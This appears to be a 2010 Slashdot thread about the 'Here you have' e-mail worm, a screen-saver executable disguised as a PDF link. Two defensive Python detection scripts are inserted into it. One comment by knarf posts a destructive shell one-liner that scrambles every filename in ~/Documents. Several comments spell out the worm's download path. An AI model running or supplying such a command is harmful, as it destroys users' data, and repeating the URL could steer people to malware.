      Licenses for computer use are absurd. What next, for using cell phones (which are computers)? For using any net-connected device in the future that can be configured enough by users to potentially cause mayhem on the network? How many licenses per day per office would need to be processed? If it must be done online then 1) you would already need a license, and 2) it would probably involve a falsifiable process, thus rendering it into little more than a nuisance and yet another use tax and thus pointless. It has been demonstrated repeatedly, beyond a shadow of a doubt, and on a vast scale that making things illegal does not generally constitute a robust solution.

    11. Re:U R teh winnar! by Pentium100 · · Score: 1

      A competent administrator most likely could secure Windows so the user cannot run the virus anyway.

      However, a lot of computers are used at home, by one or more people sharing accounts where they know only the most basic things and ask a nerd friend when they have problems or take the computer to a repair shop. You know, a lot of people cannot install Windows even though they can read and understand the setup (also, "Hi, I have a problem with my computer, it displayed some error and now does not work. No, I do not remember the error, but maybe you know what could be the problem?").

      They will have root access to their computer (needed for apt-get or synaptic), but may run as a standard user. They will still download and run things (while most of the software is installed using repositories and apt-get or similar software, some things still have to be downloaded as .deb, .rpm, .sh or .tar.gz files, for example Canon scanner drivers, Firefox on Debian and nVidia display drivers (not sure about that though)).

    12. Re:U R teh winnar! by Anonymous Coward · · Score: 0

      I guess that what we need is a more restrictive security model, where each program, by default, is able to write only to /home/username/.programname. Trusted programs would need to be able to access /home/username, and a malicious program might trick the user into trusting them, but it's an extra layer of defence - "Why does screensaver.exe need access to my files?"

      Basically, sandboxing should be the default.

    13. Re:U R teh winnar! by Erikderzweite · · Score: 1

      >A competent administrator most likely could secure Windows so the user cannot run the virus anyway.
      As seen from other comments, NASA does not have competent administrators. Nor does the Pentagon given the 2008 outbreak. Either the bar of competency is too high for those or it is not as easy as you claim. Just sayin'.

      >some things still have to be downloaded as .deb, .rpm, .sh or .tar.gz files
      Some few is still much better than all of them.
      As newbies are more likely to use Ubuntu than Debian, Firefox and Nvidia are already covered. Not 100% sure about Canon, but I think that my gf's MFU from Canon worked without the need of manual installation with Lucid.
      Besides, Canonical tries to put commercial software into the install manager as well. With them being the biggest desktop vendor it is yet another step towards security.

    14. Re:U R teh winnar! by dbIII · · Score: 1

      Because there is no way for a virus to spread on a Linux machine.

      I'm sure there are plenty of ways but that doesn't change the situation where the malware swamp is still an MS Windows exclusive problem.
      My theory is that Linux learnt from all the years of students running a variety of exploits on Unix while the Microsoft platform for some unknown reason did not want to learn from the errors of the past.
      For the last few years they've had no choice but to learn from those mistakes but there is a lot of catching up to do. We'll probably see SELinux style protection on MS Windows soon (i.e. if the app is behaving in a way that is not on the list don't let it run - deny by default) instead of trying to protect by just having a list of what is not allowed (allow by default). Having a virus definition list doesn't help the first few computers that get a new virus that is not yet on the list.

    15. Re:U R teh winnar! by Pentium100 · · Score: 1

      Well, I chose Debian because a version stays current for a long time (and supported even longer), unlike Ubuntu, which probably has a new version released faster than service packs for Windows. Still, the most secure way is the way Apple does it on their iP(ad|od|hone)s, but I do not like it, I'd rather face the risk of a virus (or rather a worm - I have not seen an actual virus (that infects other files instead of being a separate file) for a long time) than be told by some company what programs I can and cannot run on my computer (I don't think Apple does it for computers too, just the small devices).

      As for NASA and the Pentagon - I don't know the situation there, so I can't really comment about it, but on Windows you can make the system drive read-only and deny execution of files from any other drives.

    16. Re:U R teh winnar! by Pentium100 · · Score: 1

      Also, as I said, Linux has small market share and a lot of the users know what they are doing, so it is less profitable to write a virus for Linux (or Mac, or Windows 3.11) than it is with Windows XP/Vista/7.

      Still, "the worst a virus on Linux can do is delete all your documents, it cannot break the system files" is quite bad.

    17. Re:U R teh winnar! by Erikderzweite · · Score: 1

      The interesting thing is: Canonical seems to want to make some kind of an AppStore for commercial software on Ubuntu which will be integrated into the software manager along with all the software from repositories. So you get the best of both worlds: the user can get everything from the software manager, but does not have to.
      Doesn't solve the problem completely, but it is the best one can get without losing essential freedoms.

    18. Re:U R teh winnar! by Anonymous Coward · · Score: 0

      If it's not in the Ubuntu Software Center, don't (#&@ing install it. Period. Even software you need to *buy* is in there now. That's what I tell my mom. If you need something that isn't there, you contact me and I'll check it out for you.

    19. Re:U R teh winnar! by dbIII · · Score: 1

      That no longer holds - the market share is HUGE in the shape of ADSL modems that every spammer would love to have control of. Many of them are owned and have been set up by an MS windows user that has had or will get a computer virus. The main difference is that the defaults on these devices are not STUPID.

      "the worst a virus on Linux can do is delete all your documents, it cannot break the system files"

      However that is still not happening.

    20. Re:U R teh winnar! by Pentium100 · · Score: 1

      Can you even download and install additional programs on your ADSL modem? I could not do that with my modem (D-Link DSL-500T), so any spammer would have to exploit security bugs on the device (if there are any).

      Not to mention that there are a lot of different modems, and while most of them run Linux, not all of them are compatible or even have compatible CPUs.

    21. Re:U R teh winnar! by Confusador · · Score: 1

      This is very close to being right, and exactly why I wish Linux were better about letting me (or more accurately, my family) install things without admin rights. I wish that Linux viruses and, more importantly, trojans would be restricted to just blowing away home. Then they would 1) only be able to damage their own files through stupidity and 2) be easily stopped by a virus scanner. Of course, this is all in my dream world where Linux is used enough to have enough viruses to need virus scanners, but still. As it is now, people have every reason to assume that they need to put in their password to see the fluffy bunnies.

    22. Re:U R teh winnar! by EvanED · · Score: 1

      This is very close to being right, and exactly why I wish Linux were better about letting me (or more accurately, my family) install things without admin rights.

      Same here. Both myself and a friend occasionally do a look around for a package manager that you can use as non-root, and so far have basically struck out in terms of ones that work. (It's been a while since the last round, but as I recall the closest we got was GoboLinux's. My friend is the one who tried that out, and I forget what his gripes were.) I just yesterday started using GNU Stow as a very, very partial solution.

      I wish that Linux viruses and, more importantly, trojans would be restricted to just blowing away home. Then they would 1) only be able to damage their own files through stupidity and 2) be easily stopped by a virus scanner

      I think that #1 is a benefit that's greatly overstated by some people in the Linux community. Compromising a user account is an improvement over compromising the system, I don't want to dispute that... but given that (1) everyone's most important data is accessible by their user and (2) I estimate that on a vast majority of systems, compromising the user account almost is compromising the system.

      I would also disagree with #2; I don't think that the biggest problems with malware detection come from the malware disabling the scanners by running at the same level, I think they come from things like polymorphic viruses and such that are just flat out hard to detect.

    23. Re:U R teh winnar! by KiloByte · · Score: 1

      Just like today's Girl Genius strip (in the last panel).

      --
      The creatures outside looked from Alt-Right to Antifa; but already it was impossible to say which was which.
    24. Re:U R teh winnar! by Raenex · · Score: 1

      I wish that Linux viruses and, more importantly, trojans would be restricted to just blowing away home.

      I wish Linux made it easy to sandbox applications, so that I wouldn't have to worry about running a trojan.

    25. Re:U R teh winnar! by _Sprocket_ · · Score: 1

      Heh. Indeed. Girl Genius is great stuff.

  8. This is not a worm by chispito · · Score: 1

    It is a file that is linked in the spam message itself, with an .SCR extension (.SCR is a screen saver extension in win32, if I am not mistaken), though the text of the file reads as though it were a PDF. In Outlook, at least, downloading and executing the file immediately causes the user's outbox to fill with emails to all of his or her closest coworker friends. The emails have the subject "Here you have."

    --
    The Daddy casts sleep on the Baby. The Baby resists!
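
The disguise described above, a Win32 screen saver (.SCR) presented as if it were a PDF, is the kind of thing a mail gateway can flag before the file is ever opened. The Python below is an added example (not chispito's code and nothing taken from the worm): it judges an attachment by its extension chain and its leading bytes. The attachment names and byte strings are constructed, not real samples.

```python
"""Triage an attachment from its name plus its first bytes: flag Windows
executable extensions (.SCR included), a document extension hidden before a
final executable one, and content that does not match the claimed type."""
import os

# Extensions Windows executes directly on double-click; .scr is a PE like .exe.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js"}

# Leading bytes expected for a few data formats that open in a viewer, not a loader.
DOC_MAGIC = {".pdf": b"%PDF", ".zip": b"PK\x03\x04", ".docx": b"PK\x03\x04"}
PE_MAGIC = b"MZ"  # DOS/PE header shared by .exe and .scr files


def extensions(filename: str) -> list[str]:
    """All extensions, outermost last: 'party.pdf.scr' -> ['.pdf', '.scr']."""
    base = os.path.basename(filename)
    exts = []
    while True:
        base, ext = os.path.splitext(base)
        if not ext:
            return exts[::-1]
        exts.append(ext.lower())


def classify_attachment(filename: str, head: bytes) -> list[str]:
    """Return findings for one attachment; an empty list means nothing looked off."""
    findings = []
    exts = extensions(filename)
    last = exts[-1] if exts else ""
    if last in EXECUTABLE_EXTS:
        findings.append(f"executable extension {last}")
    if len(exts) > 1 and exts[-2] in DOC_MAGIC:
        # With "hide extensions for known file types" on, Explorer shows
        # party.pdf.scr as party.pdf, so the inner extension is the bait.
        findings.append(f"document extension {exts[-2]} hidden before {last}")
    if head.startswith(PE_MAGIC) and last not in EXECUTABLE_EXTS:
        findings.append("PE header under a non-executable extension")
    expected = DOC_MAGIC.get(last)
    if expected is not None and not head.startswith(expected):
        findings.append(f"content does not match {last} magic")
    return findings


# Constructed sample attachments as (name, first bytes); none are real files.
SAMPLES = [
    ("quarterly_report.pdf", b"%PDF-1.4\n%..."),
    ("Here you have.pdf.scr", b"MZ\x90\x00\x03\x00"),
    ("invoice.pdf", b"MZ\x90\x00\x03\x00"),
    ("photos.zip", b"PK\x03\x04\x14\x00"),
]


def triage(samples):
    """Map each attachment name to its list of findings."""
    return {name: classify_attachment(name, head) for name, head in samples}


if __name__ == "__main__":
    for name, findings in triage(SAMPLES).items():
        print(f"{name}: {'; '.join(findings) or 'ok'}")
```
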
  9. LOL - My inbox was full this morning by Anonymous Coward · · Score: 0

    LOL - My inbox was full this morning with this email. Go multinational corporations - maximum effect for this crud.

    *sigh* now my day will be full of work cause I'm the IT Admin *cry*

  10. Hit NASA today by Anonymous Coward · · Score: 2, Interesting

    It started working its way through NASA and contractor mail servers today. Lots of folks send mail to distribution lists and so those were getting lots of backwash from people replying to them, saying they didn't think the message was for them...

    1. Re:Hit NASA today by Anonymous Coward · · Score: 0

      At least Jeanie isn't around to yank the Center off the 'Net because of a stupid Windows worm anymore.

  11. Probing by religious+freak · · Score: 1, Insightful

    So... *if* you were a government or some other organization - wouldn't this be a cool method of probing for vulnerabilities???
    *removes tinfoil hat

    --
    If you can read this... 01110101 01110010 00100000 01100001 00100000 01100111 01100101 01100101 01101011
  12. People still fall for this? by kheldan · · Score: 2, Funny

    For that matter, people are still using Outlook?

    They're still using Outlook for email

    laughingwomen.jpg

    --
    Are YOU using the TOOL, or is the TOOL using YOU? Think about it!
    1. Re:People still fall for this? by jack2000 · · Score: 1

      If you still use outlook you deserve to get what is coming for you.

    2. Re:People still fall for this? by Anonymous Coward · · Score: 0

      "If you still use outlook you deserve to get what is coming for you."

      There's nothing else on the market that has anywhere near the same features as Outlook/Exchange. That's why people use it. It works, and it works well. There are some sad open source kludges that approximate some of the functionality, but that's about it.

    3. Re:People still fall for this? by Eskarel · · Score: 1

      Just as a point of clarification, Outlook is actually a very good e-mail client. Outlook Express, however, is not by any stretch of the imagination the same product, and is an insecure PoS; it also doesn't exist in Vista or Windows 7.

    4. Re:People still fall for this? by jimicus · · Score: 1

      Just as a point of clarification, Outlook is actually a very good e-mail client. Outlook Express, however, is not by any stretch of the imagination the same product, and is an insecure PoS; it also doesn't exist in Vista or Windows 7.

      Sorry, but I'm going to have to call you out on that one.

      Outlook is an outstanding Exchange client. But you mustn't think of Exchange as just email because it's a hell of a lot more than that - plain email doesn't give you shared calendars, it doesn't give you a centralised to-do list, it doesn't give you a group address book, it seldom gives you any form of advanced access control which can be managed from the client to allow, e.g., the CEO's PA to send and retrieve email on his behalf without having to log in as the CEO.

      If you use Outlook as a plain email client with, e.g., IMAP or POP, it's actually pretty lousy.

    5. Re:People still fall for this? by donatzsky · · Score: 1

      Actually, Windows Mail (the one that comes with Vista) is just Outlook Express with a new coat of paint.
      Live Mail, on the other hand, should be an entirely new client.

    6. Re:People still fall for this? by drunken-yeti · · Score: 0

      oh no we are all using CompuServe mail, pine and Lotus Notes on OS/2 Warp machines

  13. Sandboxie: 29 EUR by tepples · · Score: 1

    The actual reason is that the users still haven't learned from the last 9 years of experience.

    The other reason is that Windows still doesn't include an easy point-and-click tool to make a jail in which to run an untrusted app. If Windows had this, people wouldn't have to spend 29 EUR on Sandboxie.

    1. Re:Sandboxie: 29 EUR by causality · · Score: 1

      The actual reason is that the users still haven't learned from the last 9 years of experience.

      The other reason is that Windows still doesn't include an easy point-and-click tool to make a jail in which to run an untrusted app. If Windows had this, people wouldn't have to spend 29 EUR on Sandboxie.

      That sounds to me like a technical solution to a non-technical problem. Make no mistake, the inability to learn from the last 9 years of active history is firmly within the realm of a non-technical problem.

      Maybe that'll work and maybe it won't. If it works, it'll be a band-aid at best, with no hope of solving the underlying problem. If perfectly implemented, the sandbox would only shift the goal of the social engineering attack. Instead of getting clueless users to run untrustworthy executables, it'll have a stronger focus on getting them to give up passwords, personal information, and other information that can be abused with or without a sandbox. Until and unless you solve the problem of ignorant users who fall for social engineering attacks the best sandbox in the world won't be any sort of panacea.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    2. Re:Sandboxie: 29 EUR by tepples · · Score: 1

      [A jail] sounds to me like a technical solution to a non-technical problem.

      Which makes it no different from any other access control measure in an operating system.

    3. Re:Sandboxie: 29 EUR by Mongoose+Disciple · · Score: 1

      The other reason is that Windows still doesn't include an easy point-and-click tool to make a jail in which to run an untrusted app. If Windows had this, people wouldn't have to spend 29 EUR on Sandboxie.

      Useless, in this case. The people who fall prey to a virus like that won't be technical enough to do that (even with an easy point and click tool) after another 20 years of using computers, much less now.

    4. Re:Sandboxie: 29 EUR by tepples · · Score: 1

      The people who fall prey to a virus like that won't be technical enough to do that (even with an easy point and click tool)

      If something like Sandboxie were bundled with the operating system, mail clients would by default run mail attachments in a sandbox. But you're right that it wouldn't stop "This application wants to break out of jail: Cancel or Allow?" from getting a click on Allow. The only thing that can stop that is mandatory verification of the hardware maker's digital signature on everything from the bootloader on up, as seen in iPhone and other consoles.

    5. Re:Sandboxie: 29 EUR by causality · · Score: 1

      [A jail] sounds to me like a technical solution to a non-technical problem.

      Which makes it no different from any other access control measure in an operating system.

      I have some real doubts about that. For example, you can compile all Linux software from source and introduce hardening measures like NX bit, address base randomization, canaries, etc. Buffer overflows are a technical problem and the measures I summarized (and certainly have not exhaustively listed) really do make it technically much more difficult to conduct a buffer overflow type of exploit.

      The difference is that most buffer overflows occur in software that the user intended to install and intended to run. That's quite a bit different from a social engineering attack that tricks a user into running software that the user would not run if the user had perfect knowledge of what the software is intended to do. The former is a technical problem and access controls are one appropriate technical solution. The latter is a social problem and technical measures are a stopgap solution, at best, compared to actually educating users.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    6. Re:Sandboxie: 29 EUR by causality · · Score: 2, Insightful

      The people who fall prey to a virus like that won't be technical enough to do that (even with an easy point and click tool)

      If something like Sandboxie were bundled with the operating system, mail clients would by default run mail attachments in a sandbox. But you're right that it wouldn't stop "This application wants to break out of jail: Cancel or Allow?" from getting a click on Allow. The only thing that can stop that is mandatory verification of the hardware maker's digital signature on everything from the bootloader on up, as seen in iPhone and other consoles.

      An iPhone may or may not be an appliance, but general-purpose computers and the operating systems designed for them are certainly not appliances.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    7. Re:Sandboxie: 29 EUR by Anonymous Coward · · Score: 0

      ACLs are useful technological measures, just not for what they imply them to be. These technologies come from the military where you aren't protecting from viruses but from other users with different sets of privileges. The military can also forbid any unsigned executable file to run. And if you complain you get shot.

      When applied to regular OSes where there is only one user and you are trying to protect him from himself, they are completely useless. The user will authorize unsigned executable files to run at the privilege level they ask for. And he will get angry if your OS keeps him from doing it.

      Jails' main problem is that they imply that you have allowed an attacker to get absolute control over the whole isolated unit which most likely has security implications. It is better than him controlling a process having access to the whole system right away, but it isn't safe, even assuming the jail is tight and break-proof.

      And that still ignores the fact that a jail set up by the 'good' program itself has the above properties in case of a data execution exploit, but a malicious executable like the one in TFA will ask the user to open its door in order to get to the library.

    8. Re:Sandboxie: 29 EUR by symbolset · · Score: 1

      What surprises me is that there's no Windows Server AD console you can use to isolate and terminate the users who fall for this nonsense.

      --
      Help stamp out iliturcy.
    9. Re:Sandboxie: 29 EUR by JohnBailey · · Score: 1

      If something like Sandboxie were bundled with the operating system, mail clients would by default run mail attachments in a sandbox. But you're right that it wouldn't stop "This application wants to break out of jail: Cancel or Allow?" from getting a click on Allow. The only thing that can stop that is mandatory verification of the hardware maker's digital signature on everything from the bootloader on up, as seen in iPhone and other consoles.

      Does that include Jailbroken iPhones and consoles running homebrew apps?

      If not.. Then your solution is not going to work.

      NEVER underestimate the clueless user's aptitude for defeating security measures.

      --
      It is difficult to get a man to understand something when his job depends on not understanding it.
    10. Re:Sandboxie: 29 EUR by jimicus · · Score: 1

      An iPhone may or may not be an appliance, but general-purpose computers and the operating systems designed for them are certainly not appliances.

      Why not?

      I'm deadly serious here, so don't automatically mark me down as a troll. Obviously it's not appropriate for all, but for a great many computers in organisations up and down the country, the person sat in front of the computer doesn't own it and isn't supposed to use it for non-work related stuff. Why shouldn't the computer be locked down so tight that it is more-or-less impossible to even run a non-approved application, enforced by means of TPM or something very like it?

    11. Re:Sandboxie: 29 EUR by StuartHankins · · Score: 1

      There's little reason not to lock down corporate computers. Microsoft provides group policy and other tools explicitly for this purpose.

      BUT BUT BUT some software causes issues, for instance UPS WorldShip software requires administrative access to run. It's a stupid limitation, and one we raised with them numerous times to no avail. Our solution was to switch to FedEx. For some companies, individual pieces of software may require elevated privileges and there may not be a competing package to switch to.

  14. Windows is super! by CrAlt · · Score: 2, Informative

    My MS Exchange email box at work filled up with these right before the server died..

    Subject: Here you are
    --------------
    Hello:

    This is The Document I told you about,you can find it Here.http://www.sharedocuments.com/library/PDF_Document21.025542010.pdf

    Please check it and reply as soon as possible.

    Cheers,

    Domain Name: SHAREDOCUMENTS.COM

    Registrant:
            Worldwide Media, Inc
            Domain Administrator (info@mostwanteddomains.com)
            Po Box 129
            Highlands
            North Carolina,28741
            US
            Tel. +001.8132675600
            Fax. +001.9543370351

    Creation Date: 09-Oct-2003
    Expiration Date: 09-Oct-2011

    Domain servers in listed order:
            ns17.this-domain-is-4-sale.com
            ns17.mostwanteddomains.com

    -----------------

    --
    I have to return some videotapes...
    1. Re:Windows is super! by Anonymous Coward · · Score: 3, Informative

      The actual underlying link is from http://members.multimania.co.uk/yahoophoto/... sharedocuments.com is a decoy

    2. Re:Windows is super! by Anonymous Coward · · Score: 4, Insightful

      Turn in your low slashdot ID immediately.

    3. Re:Windows is super! by Marauder2 · · Score: 4, Interesting

      Before the collective wrath of Slashdot falls upon an innocent* cyber squatter, bear in mind that the URL listed in the text of the email wasn't actually the URL that the href linked to (text claimed to point to one spot, actual href tag pointed some place completely different). It didn't link to a PDF either but an executable with the .scr (Windows Screensaver) extension.

      *Presumed innocent in the context of this malware, not in the grander scheme of effing up the domain registry system for the rest of us...

    4. Re:Windows is super! by religious+freak · · Score: 0, Offtopic

      Maybe that's the guy that bought the low uid a few years back? Pitchforks and torches!
      *kidding*

      --
      If you can read this... 01110101 01110010 00100000 01100001 00100000 01100111 01100101 01100101 01101011
    5. Re:Windows is super! by benraldo · · Score: 1

      the link in the email actually points to.. added some spaces to break the url. Browse to this only if you want to get the worm, or feel comfortable that you are protected. http : // members.multimania.co.uk / yahoophoto / PDF_Document21_025542010_pdf . scr Hello: This is The Document I told you about,you can find it Here.http://www.sharedocuments.com/library/PDF_Document21.025542010.pdf Please check it and reply as soon as possible. Cheers,

    6. Re:Windows is super! by Anonymous Coward · · Score: 0

      I had several of these arrive in my Inbox. The link was Hijacked. The website you list is not the same one it links to. It actually re-directs to a members.multimania.co.uk address. I was not one of the baboons to click the link. I actually pointed out to a co-worker that it's a different link. He was also smart enough not to click it. Investigate the email again and you'll see the re-direct address. Outlook shows you if you hover the mouse over the link. But for the love of god, don't accidentally click it.
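The mismatch the posters above describe (the visible text looks like a .pdf URL on one host, the real href points at a .scr on another host) is something a mail gateway or a help-desk triage script can check mechanically. Added example, not code from any poster: it parses an HTML body and flags anchors whose displayed URL disagrees with the href, or whose real target has an executable extension; the sample message and the host malware-host.example are constructed stand-ins for the thread's mail.

```python
"""Flag e-mail links whose visible text is a URL that does not match the real
href, or whose real target ends in an extension Windows runs as a program.
Added example; the sample message below is constructed to mimic the
"Here you have" mail discussed in the thread, not a captured copy."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Extensions Windows treats as runnable on double-click. A .scr (screen saver)
# is an ordinary PE executable under another name, which is the trick this
# worm used behind a ".pdf"-looking link.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js"}

# Constructed sample, modelled on the mail quoted in the thread. The href host
# is a placeholder; the displayed URL is the decoy text the posters quoted.
SAMPLE_MAIL = """<p>Hello:</p>
<p>This is The Document I told you about, you can find it Here.
<a href="http://malware-host.example/yahoophoto/PDF_Document21_025542010_pdf.scr">http://www.sharedocuments.com/library/PDF_Document21.025542010.pdf</a></p>
<p>Please check it and reply as soon as possible.</p>
<p><a href="http://www.sharedocuments.com/">www.sharedocuments.com</a></p>"""


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def _looks_like_url(text):
    return text.lower().startswith(("http://", "https://", "www."))


def _normalise(url):
    # urlparse only splits host from path when a scheme is present.
    if not url.lower().startswith(("http://", "https://")):
        url = "http://" + url
    return urlparse(url)


def _host_of(url):
    return (_normalise(url).hostname or "").lower()


def _ext_of(url):
    path = _normalise(url).path.lower()
    last = path.rsplit("/", 1)[-1]
    dot = last.rfind(".")
    return last[dot:] if dot != -1 else ""


def suspicious_links(html):
    """Return [(href, reason)] for every anchor in `html` that looks deceptive
    or points at an executable. An empty list means nothing was flagged."""
    parser = _AnchorCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.anchors:
        reasons = []
        real_ext = _ext_of(href)
        if _looks_like_url(text):
            # Displayed URL and real URL disagree on host and/or file type.
            if _host_of(text) != _host_of(href):
                reasons.append(f"displayed host {_host_of(text)} != actual host {_host_of(href)}")
            if _ext_of(text) and _ext_of(text) != real_ext:
                reasons.append(f"displayed extension {_ext_of(text)} != actual {real_ext or '(none)'}")
        if real_ext in EXECUTABLE_EXTENSIONS:
            reasons.append(f"target is a {real_ext} executable")
        if reasons:
            findings.append((href, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for href, reason in suspicious_links(SAMPLE_MAIL):
        print(f"SUSPICIOUS {href}\n  {reason}")
```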

    7. Re:Windows is super! by Nethead · · Score: 0, Offtopic

      That was mfh (56).

      --
      -- I have a private email server in my basement.
    8. Re:Windows is super! by Anonymous Coward · · Score: 0

      The underlying URL is wrong. The link is actually:
      Notice that the link is:
            members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr
      (removed Http:// so people don't click on it.....)

    9. Re:Windows is super! by religious+freak · · Score: 1

      How do you know that?

      --
      If you can read this... 01110101 01110010 00100000 01100001 00100000 01100111 01100101 01100101 01101011
    10. Re:Windows is super! by Nethead · · Score: 1

      How do you know that?

      He told me.

      --
      -- I have a private email server in my basement.
  15. Adobe PDF zero day saved me by Maxo-Texas · · Score: 2, Interesting

    I was suspicious of any PDF today.

    Might not have clicked on it but I might have. You normally think of PDF's as safe.

    --
    She was like chocolate when she drank... semi-sweet at first and then increasingly bitter.
    1. Re:Adobe PDF zero day saved me by Anonymous Coward · · Score: 0

      but they really aren't http://www.technewsworld.com/story/70791.html

    2. Re:Adobe PDF zero day saved me by archmcd · · Score: 2, Informative

      I haven't thought of PDF's as safe in a couple years now.
      http://www.computerworld.com/s/article/9176117/PDF_exploits_explode_continue_climb_in_2010

      --
      I'm not an expert, but I play one on slashdot.
    3. Re:Adobe PDF zero day saved me by bloodhawk · · Score: 3, Informative

      You normally think of PDF's as safe.

      What planet are you from? Have you not seen or heard of the literally dozens of exploits and vulnerabilities constantly flowing from Adobe's readers and file format? They make Microsoft look like Fort Knox.

    4. Re:Adobe PDF zero day saved me by Anonymous Coward · · Score: 0

      We got hit with it work today too. The file actually had a .scr extension; all that PDF stuff is a smoke screen

    5. Re:Adobe PDF zero day saved me by webheaded · · Score: 1

      It wasn't actually a PDF. This circulated through my work today and when you hovered over it, the thing went to a different site with a .scr extension.

      --
      "Those who would sacrifice essential liberties for a little temporary safety deserve neither liberty nor safety." - BenF
    6. Re:Adobe PDF zero day saved me by LBt1st · · Score: 1

      I know I certainly don't!

      Apparently I'm in the minority because today our company got owned by this thing.
      Our IT staff is a joke though. Hundreds of employees and their solution was to have someone walk around from cubicle to cubicle telling everyone not to open the e-mail (of course even after being told people were still opening the PDF). These things filled everyone's inboxes for about two hours before the exchange server finally crashed.
      Apparently we've got other critical tasks being run on the same box(es) as well so it didn't just affect our e-mail.

    7. Re:Adobe PDF zero day saved me by knarf · · Score: 1

      Whoa there. PDF's can be as safe as you want them to be. Safety does not depend on the file format but on the application interpreting that file format. You thought plain text files were safe? What if your 'viewer' contains code to execute any code it can find in that file?

      Hey, read this plain text file - it is perfectly safe after all

      (cd ~/Documents;find . -type f|while read f;do mv "$f" $(dirname "$f")/$(basename "$f"|sha1sum|cut -d " " -f 1);done) &

      Oh by the way have a look at your ~/Documents directory...

      KTHXBY

      --
      --frank[at]unternet.org
    8. Re:Adobe PDF zero day saved me by wvmarle · · Score: 1

      Well as long as you are not using Adobe reader you're quite safe.

      And pdf suddenly becomes an enjoyable format. Often relatively small file size, good readability, guaranteed layout, quick launch of the reader... I still don't know why /. always puts "pdf warning" at links to pdf files.

    9. Re:Adobe PDF zero day saved me by NoseyNick · · Score: 1

      never mind the fact that it was a windows exe hiding as a .scr hiding as a pdf.

      --
      Nick Waterman, Sr Tech Director, #include <stddisclaimer>
    10. Re:Adobe PDF zero day saved me by Maxo-Texas · · Score: 1

      I'm usually very cautious.
      I actually haven't been infected since the mid 90's. Before that it was "Something wonderful is happening" on the Amiga.

      But in a work environment, behind a firewall, virus scanning software, etc. I think people are lulled into accepting a PDF.

      More than pictures or other kinds of links which were used in the past.

      --
      She was like chocolate when she drank... semi-sweet at first and then increasingly bitter.
  16. easy fix by alphaminus · · Score: 1

    sfc /scannow

  17. It's already hit NASA by ToSeek · · Score: 4, Interesting

    Got sent to a maillist that covers just about everyone who works at a NASA center east of the Mississippi. Once you add up the virus-generated emails, the emails warning everyone it's a worm, and the emails complaining "for God's sake don't reply to everybody" (which replied to everybody), there were several score messages sent to thousands of users.

    1. Re:It's already hit NASA by ShaunC · · Score: 1

      This was modded insightful? Christ. I know how to secure a computer. I know fuck-all about propelling a rocket into space. So some NASA folks may not know how to compute securely; but they're busy landing probes on Mars. Yes, NASA does rock!

      Intelligent doesn't equal computer savvy, nor does the opposite always hold true. There are plenty of Ph.Ds in mathematics who don't even use a calculator on a regular basis, much less a computer.

      --
      Thanks to the War on Drugs, it's easier to buy meth than it is to buy cold medicine!
    2. Re:It's already hit NASA by eyenot · · Score: 1

      Bullshit. The discussion on this particular topic has all rotated around one central concept: that this outbreak occurred was stupid as hell and denotes a complete lack of any sort of basic understanding of how computers are used on behalf of people who use computers for very important things not only in their lives but many of our own.

      --
      "Stratigraphically the origin of agriculture and thermonuclear destruction will appear essentially simultaneous" -- Lee
  18. i JUST got this virus! by nimbius · · Score: 4, Funny

    thank goodness I saw this article...i was seconds away from clicking on the attachment in Pine.

    --
    Good people go to bed earlier.
    1. Re:i JUST got this virus! by codepunk · · Score: 1

      Good thing you didn't; it may have jacked up your copy and paste buffer.

      --
      Got Code?
    2. Re:i JUST got this virus! by eulernet · · Score: 1

      ... and you would have missed the joke !

  19. Dumb Question.... by ozzy85 · · Score: 0

    Who has the time to write these worms? And why the hell do they write them? I honestly cannot see one incentive to do so.

    1. Re:Dumb Question.... by CrazyJim1 · · Score: 1

      People in countries with no cyber laws do it because they're typically congratulated if found out instead of imprisoned. Also if you write for a botnet, you can then leverage your botnet to do interesting stuff mimicking a super computer, or just have an extensive proxy network where you can game social systems. The main reason is a lot of people will do scummy things to make money.

    2. Re:Dumb Question.... by Anonymous Coward · · Score: 0

      stealing personal information like wow account cc numbers and social security number

    3. Re:Dumb Question.... by jack2000 · · Score: 1

      Malice? Script kiddies grinding their teeth? People hate people?

      Working with people has made me jaded and callous but not enough to start writing viruses.

    4. Re:Dumb Question.... by melikamp · · Score: 1

      I've known people in my high school (the Russian equivalent of it) who wrote DOS viruses in assembly back in 94-96. Great times. One virus, at least, made a splash in Ukraine, or so I've been told. So there you have it: bored high school students. If no one else did it, it would be more than enough, but nowadays one can actually make money doing that.

    5. Re:Dumb Question.... by gmuslera · · Score: 1

      Not sure if all it does is just spreading itself. Could try things in the style of the Zeus Botnet to get some profit

    6. Re:Dumb Question.... by Erikderzweite · · Score: 1

      It is not that hard. This one just tricks a user into launching an executable. The rest are just technicalities.

  20. Umm.. nope. by CrAlt · · Score: 4, Insightful

    That would only work if you were logged in as the admin account..
    Or do you do everything as root?

    Last login: Thu Sep 9 18:35:16 on console
    focker:~ cralt$ cd /
    focker:/ cralt$ touch testfile
    touch: testfile: Permission denied
    focker:/ cralt$ uname -a
    Darwin focker.local 9.8.0 Darwin Kernel Version 9.8.0: Wed Jul 15 16:55:01 PDT 2009; root:xnu-1228.15.4~1/RELEASE_I386 i386

    Thank you come again.

    --
    I have to return some videotapes...
    1. Re:Umm.. nope. by BenoitRen · · Score: 2, Informative

      The grandparent was talking about Macs, smartass.

    2. Re:Umm.. nope. by LordLimecat · · Score: 1

      And guess what-- the "in 2010" comment doesn't really apply to an OS from 2002, does it? Win7 and Vista have basically the same sudo style controls that Linux has.

      I mean really, these FUD comments have got to stop.

    3. Re:Umm.. nope. by treeves · · Score: 2, Insightful

      he did say,

      In the original account set up on your Mac ...

